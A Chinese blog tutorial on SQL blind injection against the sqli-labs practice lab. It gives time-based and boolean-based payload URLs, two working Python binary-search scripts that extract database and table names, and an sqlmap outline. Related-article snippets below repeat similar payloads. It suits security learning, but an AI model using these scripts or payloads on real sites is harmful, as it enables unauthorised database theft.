渗透之sql盲注(时间/boolean盲注)

已于 2024-05-02 20:22:07 修改
阅读量530 收藏 6
点赞数 4
文章标签: sql 数据库
于 2024-05-01 20:44:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64302290/article/details/138378981
版权

sql盲注:sql盲注意思是我们并不能在web页面中看到具体的信息,我们只能通过输入的语句的真假来判断。从而拿到我们想要的信息。

我们通常使用ascii值来进行盲注。

目录

手动注入:

时间盲注:

布尔盲注:

python脚本注入:

使用python进行布尔盲注:

使用python进行时间盲注:

使用sqlmap工具注入:

手动注入:

时间盲注:

当无论你输入的是否为真假,它都会在页面中显示。这时我们就不能使用布尔盲注,我们就需要使用时间盲注,通过判断是否沉睡来注入。

http://sqli-labs:8848/less-9/?id=1%27%20and%20if%20(%20ascii%20(substr(database(),1,1))%20%3E100%20,sleep(3),0%20)--+

ascii(substring(database(),1,1))  -----这里表示从数据库名第一位截取一位将其转化为ascii值。

and if( ascii(substring(database(),1,1))> 100,sleep(3) ,0 )--+  -----表示如果第一位的ascii值大于100就沉睡3秒,否则为假不会沉睡。

通过左上角可知在沉睡,所以我们输入的为真。

我们就可以利用页面是否沉睡来进行注入。

布尔盲注:

1语句1:这里的意思为当数据库的第一个字符的ascii码值为116时为真。下面的web界面可以判断出我们输入的这一条语句为假。所以数据库第一个字符的ascii码值不为116。

id=1' and ascii( substring(database(),1,1))=116 --+

2语句二:这里的意思为当数据库的第一个字符的ascii码值为115时为真。从下面的web界面可以判断出我们输入的这一条语句为真,那么数据库的第一个字符为“s”。

  • “s”对应的ascii码值为115

id=1' and ascii( substring(database(),1,1))=115 --+

substring解释:

substring(database(),1,1):表示从数据库第一为开始截取一个字符
substring(database(),2,1):表示从数据库第二位开始截取一个字符
.
.
.
substring(database(),n,1):表示从数据库第n位开始截取一个字符

总结:我们就可以通过这样的语句来一个一个字符的将它注入出来。不过手动注入麻烦代价又大,所以我们一般会写一个脚本来注入。

python脚本注入:

使用python进行布尔盲注:

我们使用python脚本注入:

这个python脚本使用的是二分查找。

import requests
url="http://sqli-labs:8848/less-5/?"
def sql_inject(url):
    name=" "
    for i in range(1,100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
#            查数据库名
#           urs = "1' and ascii( substring(database(),%d,1)) > %d -- " %(i,mid)
#            查数据库中所有的表名
            urs = "1' and ascii(substring((select group_concat(table_name) from information_schema.tables  where table_schema='security'),%d,1)) > %d -- " %(i,mid)
            res = {"id":urs}
            r = requests.get(url,params=res)
            if "You are in..........." in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low +high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
sql_inject(url)

运行结果1:将数据库名注入出来

运行结果2:将所在数据库的表注入出来

使用python进行时间盲注:

使用一下python代码进行时间盲注:

import time
import requests
url1="http://sqli-labs:8848/less-9/?"
def sql_inject(url):
    name=" "
    for i in range(1,100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            #查数据库名
#           urs = "1' and if ( ascii (substr(database(),%d,1)) > %d ,sleep(1),0 ) -- " %(i,mid)
            #查表名
            urs = "1' and if ( ascii(substring((select group_concat(table_name) from information_schema.tables  where table_schema='security'),%d,1)) > %d ,sleep(1),0 ) -- " %(i,mid)
            res = {"id":urs }
            #开始前的时间
            starttime=time.time()
            r = requests.get(url,params=res)
            #请求后的时间
            endtime=time.time()
            #如果向减大于1则说明为真。
            if endtime - starttime >= 1:
                low = mid+1
            else:
                high = mid
            mid = (low +high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
sql_inject(url1)

运行结果:

注入出数据库名:

使用sqlmap工具注入:

1.运行sqlmap.py

2.注入所有数据库名

3.注入所在数据库中的所有表名

4.查所在表的列名

5.查所在列的具体值

@菜鸟小小
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
《WEB安全渗透测试》(4)SQL注入实战:时间盲注
午夜观星河
10-02 8137
《WEB安全渗透测试》(4)SQL注入实战:时间盲注 时间盲注:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间盲注访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
javascript之Boolean类型对象
10-22
本文主要介绍javascript中的Boolean类型对象,Boolean对象非常简单,却非常有用,希望能给大家做一个参考。
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1696
基于时间盲注
SQL渗透与防御——(三)SQL盲注
FisrtBqy的博客
03-04 3482
第三章 SQL盲注 1.Boolean-Base布尔型注入 布尔盲注 只返回布尔值的sql注入漏洞,通过构造语句,来判断数据库信息的正确性,再通过页面反回的布尔值,来判断正确与否。 布尔盲注方法 ' or '1'='1 以及变体 #substr()函数,截取某个字符串,与后面的字符串或数字对比 k' and substr((select database()),1,1)='s' #left(),mid(),函数,截取前几个字符与期望值对比 k' and left((database()),1
SQL注入之盲注简单总结
Zane·S的博客
07-19 3997
Mysql盲注总结 什么是盲注盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注SQL盲注SQL普通注入的区别? 普通注入是可以根据报错提示,进行sql语句注入从而,直接爆出我们想要的信息,比如数据库版本、数据库名、用户名、操作系统版本等;而盲注只能通过多次猜测,从而猜解出有用信息。相对来说s...
N12-sql盲注原理以及boolean盲注案例实现
尐猴子君ii的博客
04-08 508
打开pikachu测试平台,选择sql盲注boolian章节 先输入’ 测试一下反馈信息。 输入一个之前注册的真实信息 发现回馈正确信息,输入kobe’ and 1=1# 发现反馈仍然为正确信息 将1=1改成1=2,错误的值,发现报错。 所以,我们可以从and 1=1判断真假来做工作了,输入之前基于报错的字符kobe’ and ascii(substr(database(),1,1))&...
渗透测试技术----常见web漏洞--SQL盲注攻击原理及防御
wwl012345的博客
08-19 3277
一、SQL盲注攻击介绍 1.SQL盲注简介 盲注是在SQL注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回的简单内容的变化来判断服务器是否存在注入。 2.SQL盲注的方法 (boolean-based)boolean型注入:通过页面的返回内容是否正确来验证是否存在着注入 (time-based)时间型注入:通过SQL语句的处理时间的不同来判断是否存在注入,时间型注入可以使用be...
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 1887
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
php基于错误的盲注,从一道CTF代码审计题看SQL盲注
weixin_42299427的博客
04-14 514
文章难易度【★★★】文章阅读点/知识点: PHP代码审计、MySQL盲注、CTF技巧文章作者: 0h1in9e本文参与i春秋社区原创文章奖励计划,未经许可禁止转载0x01前言笔者在上个月参加一个CTF比赛的时候,遇到了一个PHP代码审计类的题目。具体地来说是关于一道SQL盲注类的题目。做了这道题之后,对SQL盲注有了更深入的了解,今天给大家分享下这道CTF题目以及解法,以及透过这个题目聊聊盲注。0...
SQL | POST基于时间与布尔盲注
m_de_g的博客
12-06 1421
SQL | POST基于时间与布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间盲注 3.POST基于布尔的盲注 4.sqlmap安全测试 ...
Mybatis4 之Mybatis动态sql的实现代码
09-08
主要介绍了Mybatis4 之Mybatis动态sql的实现代码,本文给大家提到了静态sql与动态sql有什么区别,通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
JavaScript类型系统之布尔Boolean类型详解
10-22
主要介绍了JavaScript类型系统之布尔Boolean类型详解的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
基于JavaScript 数据类型之Boolean类型分析介绍
10-27
本篇文章小编为大家介绍,基于JavaScript 数据类型之Boolean类型分析介绍。需要的朋友参考下
PL/SQL数据类型及操作符
01-19
boolean 表1显示了数字数据类型;表2显示了字符数据类型;表3显示了日期和布尔数据类型。 表1 Scalar Types:Numeric Datatype Range Subtypes description BINARY_INTEGER -214748-2147483647 ...
数据库SQL编写规范-SQL书写规范整理(SQL语句书写规范全解-Word原件)
xx_123321456的博客
05-14 306
​​​​​​工作安排任务书,可行性分析报告,立项申请审批表,产品需求规格说明书,需求调研计划,用户需求调查单,用户需求说明书,概要设计说明书,技术解决方案,数据库设计说明书,详细设计说明书,单元测试报告,总体测试计划,单元测试计划,产品集成计划,集成测试报告,集成测试计划,系统测试报告,产品交接验收单,验收报告,验收测试报告,压力测试报告,项目总结报告,立项结项审批表,成本估算表,项目计划,项目周报月报,风险管理计划,质量保证措施,项目甘特图,项目管理工具,操作手册,接口设计文档,软件实施方案,运维方案,安
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 826
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
使用DBeaver的第2天-使用sql导入数据
2301_78094435的博客
05-14 249
但是如果你执行失败了,多半可能是因为本地没有部署mysql,记住只有本地有mysql才可以执行脚本,否则你只能粘贴脚本,到sql控制台执行了。特别注意,较长的脚本粘贴的话一定会闪退,所以只有安装mysql在本地才能解决这个问题;首先位置一定要放在库上(实例),放在表上可不好使用哦。使用sql导入数据这块我会仔细的说一下。然后点击工具-再点击执行脚本。
小白也会SQL:大模型改变交互方式(中)
最新发布
鲁班模锤
05-17 749
在人工智能与自然语言处理交汇点,有一种技术正悄然改变与数据交互的方式——将日常语言转化为精准SQL查询。这一“text-to-sql”转换任务,使非专业人士也能轻松驾驭复杂的数据库操作,极大地拓宽了数据应用的边界。
string/int/ boolean
07-29
这是一个关于数据类型的问题。字符串(string)是一串字符组成的...布尔值(boolean)是一个逻辑值,只能是true或false,用来表示真或假的状态。这些数据类型在编程中经常被使用。你有关于这些数据类型的具体问题吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值